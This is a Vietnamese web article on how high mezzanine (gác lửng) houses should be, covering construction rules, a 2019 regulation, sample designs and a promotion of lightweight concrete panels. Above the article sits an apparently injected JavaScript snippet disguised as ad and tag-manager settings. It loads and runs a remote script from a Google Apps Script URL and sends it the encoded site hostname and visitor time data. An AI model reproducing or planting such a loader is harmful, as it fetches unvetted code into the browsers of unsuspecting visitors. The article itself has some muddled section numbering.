var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Chiều cao nhà gác lửng bao nhiêu – 4 Nguyên tắc xây nhà gác lửng

Chiều cao nhà gác lửng bao nhiêu là câu hỏi bạn đang quan tâm? Giải đáp chi tiết câu hỏi này, bài viết sau đây sẽ là chi tiết các nguyên tắc xây nhà tầng lửng đúng tiêu chuẩn cùng TOP 20+ mẫu nhà gác xépcó giếng trời, mái thái, mái lệch, nhà gác lửng 6×10, 6×12,… đẹp, đúng kỹ thuật để bạn có thể tham khảo.

Gợi ý: giải pháp xây nhà gác lửng tấm bê tông khí chưng áp X3 tiến độ, cách nhiệt hiệu quả

Nhà gác lửng cao bao nhiêu là đẹp? Nguyên tắc xây nhà gác lửng

1.Chiều cao nhà gác lửng

Nhà tầng lửng là phương án thi công lý tưởng cho các gia đình đang sở hữu khu đất diện tích eo hẹp và là kiến trúc nhà rất được ưa chuộng hiện nay.

Để đảm bảo nhà kiến trúc đẹp, bền vững bạn nên tuân theo 5 nguyên tắc xây nhà gác xép đẹp sau đây:

  • Chiều cao nhà gác lửng: Tùy theo thiết kế không gian nhà mà chiều cao của nhà gác xép sẽ khác nhau.

Tuy nhiên, chiều cao tầng lửng hợp lý, đúng tiêu chuẩn của nhà tầng lửng là 2.5 – 2.8m, có những không gian mới xây có thể từ 2.2 – 2.5m. Theo đó, phần gác lửng có diện tích chiếm khoảng 2/3 chiều sâu của căn nhà là thích hợp nhất.

  • Không nên thiết kế gác xép có độ dốc quá lớn: Bởi việc thiết kế gác xép quá dốc sẽ làm không khí vào trong không gian nhanh chóng bị thoát ra ngoài, khó đạt hiệu quả tụ khí theo phong thủy.
  • Không nên thiết kế xà ngang chèn ép gác xép: Theo phong thủy, nếu thiết kế xà ngang chèn ép trên gác sẽ làm suy hao tài lộc của gia chủ.
  • Chú ý vị trí kết cấu của cầu thang: Thiết kế vị trí cầu thang sao cho thuận tiện cho việc sinh hoạt nhưng vẫn không ảnh hưởng tới không gian sinh hoạt chung.
  • Nếu muốn tiết kiệm chi phí, gia chủ, nhà thầu nên kết hợp thi công xây dựng với tường 10 và 20. ( Về nguyên tắc xây tường 10, 20 tối ưu chi phí bạn có thể kéo xuống giữa bài “Xây nhà tường 10 có tốt không để có thể tham khảo)

2. Chiều cao phòng trọ có gác lửng

Theo như tài liệu thiết kế, một căn phòng trọ có gác xép bắt buộc trần nhà phải cao trên 4m, chiều cao nhà có tầng lửng phù hợp là trên 3,6m cho mỗi tầng và chiều cao dưới gác chỉ vào khoảng 1m8 – 2m.

3.Chiều cao của nhà ống gác lửng

Với khoảng diện tích nhỏ hẹp và chi phí đầu tư thấp, nhà ống gác lửng là một trong những giải pháp xây dựng được đa số các gia chủ lựa chọn.

Đối với nhà ống, thì chiều cao tiêu chuẩn của nhà gác xép là 2.5 – 2.8m.

4.Nhà cấp 4 có gác lửng cao bao nhiêu?

Giải đáp về kích thước chiều cao nhà cấp 4 gác lửng, KTS Nguyễn Trọng Thịnh cho biết:

“Thông thường ở nước ta khi xây nhà cấp 4 có gác lửng thì chiều cao tầng trệt khoảng 7m, tầng lửng khoảng 2,2m-2,5m.”

Quy định về chiều cao gác lửng

Bộ Xây dựng vừa ban hành Thông tư 07/2019 về việc sửa đổi, bổ sung, thay thế một số quy định tại Thông tư số 03/2016 quy định về phân cấp công trình xây dựng và hướng dẫn áp dụng trong quản lý hoạt động đầu tư xây dựng. Thông tư này có hiệu lực kể từ ngày 1-1-2020.

  • Đối với nhà ở riêng lẻ, tầng lửng không tính vào số tầng của công trình khi diện tích sàn tầng lửng không vượt quá 65% diện tích sàn xây dựng của tầng ngay bên dưới.
  • Đối với công trình nhà ở, công trình nhiều tầng có sàn, tầng lửng không tính vào số tầng của công trình khi chỉ bố trí sử dụng làm khu kỹ thuật (như sàn kỹ thuật đáy bể bơi, sàn đặt máy phát điện,…), có diện tích xây dựng không vượt quá 10% diện tích sàn xây dựng của tầng ngay bên dưới và không vượt quá 300m2.
  • Mỗi công trình chỉ được phép có một tầng lửng không tính vào số tầng của công trình.

Kết cấu nhà tầng lửng

Về kết cấu, bạn có thể xem chi tiết tại video sau:

Video với bản 3D kết cấu nhà gác xép sẽ giúp quý gia chủ hình dung được chi tiết thiết kế, bố trí nhà đẹp.

Tổng hợp 20+ mẫu nhà gác lửng đẹp, xu hướng năm nay

1. Mẫu nhà ống cấp 4 có thiết kế gác lửng hiện đại

Theo xu hướng thiết kế, nhà ống cấp 4 tầng lửng hiện đang được rất nhiều gia chủ ưa chuộng. Với thiết kế đơn giản, nhà ống gác xép mới nhất năm 2021 đem lại không gian sống tối giản nhưng hiện đại.

Đây là mẫu nhà thích hợp cho diện tích đất hẹp. Chủ yếu là mặt tiền thấp nhưng chiều dài lô đất lớn.

Có rất nhiều gia chủ băn khoăn: chiều cao tầng lửng là 2,5 – 2,8m rồi, vậy tường nhà cấp 4 cao bao nhiêu thì phù hợp. Giải đáp điều này các KTS cho biết: “chiều cao tường nhà cấp 4 thường xây cao khoảng 3,3 – 4m là hợp lý”.

Theo đó, những mẫu nhà cấp 4 gác xép mái thái 5×20 hay mẫu nhà cấp 4 gác lửng có sân thượng đẹp sẽ đặc biệt phù hợp với phương án xây dựng này.

Riêng phần kết cấu, những mẫu nhà ống cấp 4 đều đảm bảo 1 tầng gác lửng đầy đủ không gian phòng khách, phòng ngủ, nhà bếp, nhà vệ sinh.

Xem thêm: 10+ bản vẽ thiết kế mặt bằng nhà gác lửng 4x10m, 5×15,… chi tiết tại đây

2. Thiết kế nhà cấp 4 gác lửng có mái thái mới nhất

Bên cạnh những băn khoăn về nhà gác lửng cao bao nhiêu thì đẹp, dựa theo khảo sát, những câu hỏi về thiết kế nhà cấp 4 gác xép có mái thái cũng rất được quan tâm.

Đây là mẫu thiết kế dành cho các hộ gia đình đông người hay có nhu cầu sống cao. Đồng nghĩa với việc tiết kiệm chi phí xây nhà gác xép 300 triệu sẽ không phù hợp, gia chủ cần đầu tư về mặt chi phí trong khoảng diện tích đất lẫn xây dựng lớn hơn.

Lời khuyên từ KTS: Nhà cấp 4 tầng lửng có sân thượng mái thái luôn nổi bật khi gia chủ chọn mô hình khối vuông. Được biết, đây là lối kiến trúc quen thuộc nhưng vẫn luôn được các gia chủ ưa chuộng hiện nay.

Nhà tầng lửng có sân thượng hứa hẹn là mẫu nhà thịnh hành trong năm 2021 cũng như thời gian về sau.

3. Thiết kế nhà 2 tầng gác lửng mái thái

Thiết kế nhà gác xép 2 tầng hầu hết sẽ có từ 2 đến 4 phòng ngủ, tùy theo yêu cầu của khách hàng. Với nhu cầu về không gian sống như hiện nay, các mẫu nhà này luôn đón nhận sự ưu tiên hàng đầu từ gia chủ.

Thiết kế có mái thái theo mẫu giật gấp hiện đại tạo nên nét khác lạ. Việc sắp xếp không gian cũng như cải tạo mái nhà thành sân thượng làm cho ngôi nhà thông thoáng, hiện đại.

Nhà tầng lửng 2 tầng thực sự rất hợp với các khu mặt phố để kinh doanh buôn bán. Đối với nhà mặt phố, thiết kế này khá chuộng bởi việc vận dụng tầng trệt để kinh doanh nhưng vẫn có thể quan sát tốt từ mọi địa điểm trong nhà.

Bên cạnh đó, mẫu nhà hiện đại, đẹp mắt lại đầy đủ không gian sống chính là tiêu chí của nhiều người. Có thể nói, nhà tầng lửng mái thái có sân thượng sẽ nằm top danh sách mẫu nhà hiện đại, thịnh hành trong thời gian tới.

Bạn có thể xem thêm gợi ý 30+ mẫu nhà tiền chế 30m2 giá từ 50 – 200 triệu khác tại đây

4. Mẫu nhà phong cách châu Âu đẹp

Thay vì những mẫu thiết kế nhà biệt thự phong cách Châu Âu to lớn đồ sộ, mẫu nhà gác xép phong cách Châu Âu là lựa chọn phổ biến cho những gia chủ có khoảng đất xây dựng eo hẹp.

5. Mẫu nhà gác lửng 6×10

3. Mẫu nhà cấp 4 gác lửng 200 triệu

Nếu gia chủ muốn xem thêm các mẫu nhà gác xép, cấp 4, nhà tầng đẹp, giá rẻ thì có thể tham khảo nhiều hơn tại chuyên mục Blog của https://glumic.com/

Gợi ý xây nhà tầng lửng với vật liệu nhẹ

Trong lĩnh vực xây dựng, tấm bê tông nhẹ xuất hiện và trở thành tâm điểm trên thị trường vật liệu xây dựng hiện nay.

Sản phẩm thay thế cho các vật liệu truyền thống khi góp phần giảm thiểu tải trọng trong công đoạn làm vách ngăn, làm sàn, tường nhà,…

Được biết, tấm bê tông nhẹ khá phổ biến với các ưu điểm vượt trội như:

1.Khả năng chống cháy

Loại vật liệu được nghiên cứu và khảo sát cho khả năng chống cháy hoàn hảo cho công trình.

Đó là nhờ cấu tạo cốt liệu đặc biệt. Theo đó, vật liệu có thể cho khả năng chống cháy rất tốt khoảng 3 giờ 20 phút ở nhiệt độ 1100oC.

Đặc biệt, vật liệu nhẹ khi gặp nhiệt độ cao không cháy và cực an toàn cho sức khỏe con người.

2. Khả năng chống nước, chống thấm

Sản phẩm bê tông nhẹ cho khả năng chống thấm hoàn hảo khi chỉ số hút nước rất thấp chỉ 8,9% trong khi của gạch đỏ là 15%, gạch bê tông chưng áp AAC là 35%.

3. Khả năng chịu được tải trọng lớn

Tấm bê tông nhẹ có khả năng chịu tải rất tốt. Nếu như tấm tường có thể cho khả năng chịu trọng lượng treo lên tới 120kg thì tấm sàn có thể cho khả năng chịu tải trong lên tới hàng tấn.

Chính vì điều này mà tấm bê tông nhẹ được ứng dụng chủ yếu trong xây dựng tường nhà khung thép, lắp ghép hay sàn nhà ở dân dụng, sàn văn phòng, sàn nhà xưởng công nghiệp, …

4. Mang tới giải pháp thi công nhanh hơn X3 lần

Với quy trình thi công chỉ việc lắp ghép và sơn bả là hoàn thiện công trình, gia chủ, nhà thầu có thể tiết kiệm được nguồn chi phí thuê thợ xây dựng.

Mặt khác, khổ tấm to nên thi công tấm rất nhanh không cần phải mất thời gian lắp ván khuôn và đổ bê tông, chờ bê tông đạt mác như giải pháp xây dựng thông thường.

5. Một số ưu điểm khác

Ngoài những ưu điểm trên, tấm bê tông nhẹ còn mang tới rất nhiều đặc tính vượt trội khác như:

  • Cách nhiệt tốt, giảm chi phí điện điều hòa
  • Thân thiện với môi trường
  • Đảm bảo tuổi thọ công trình lên tới 100 năm
  • Trọng lượng siêu nhẹ (Sở dĩ được gọi là bê tông siêu nhẹ là bởi tấm bê tông nhẹ có trọng lượng 400 – 1600kg/m3, nhẹ hơn đáng kể so với tỷ trọng bê tông tươi.)
  • Dễ dàng đi đường điện nước

Nếu bạn muốn biết chi tiết về định nghĩa, cấu tạo, đặc tính ưu việt của tấm bê tông nhẹ, bạn có thể tham khảo bài viết tổng hợp thông tin về bê tông siêu nhẹ này tại đây!

Trên đây là những giải đáp về Chiều cao nhà gác lửng là đẹp và những gợi ý mẫu nhà gác xép đẹp. Hy vọng rằng với những thông tin trên sẽ giúp gia chủ lựa chọn được thiết kế phù hợp cho ngôi nhà mình.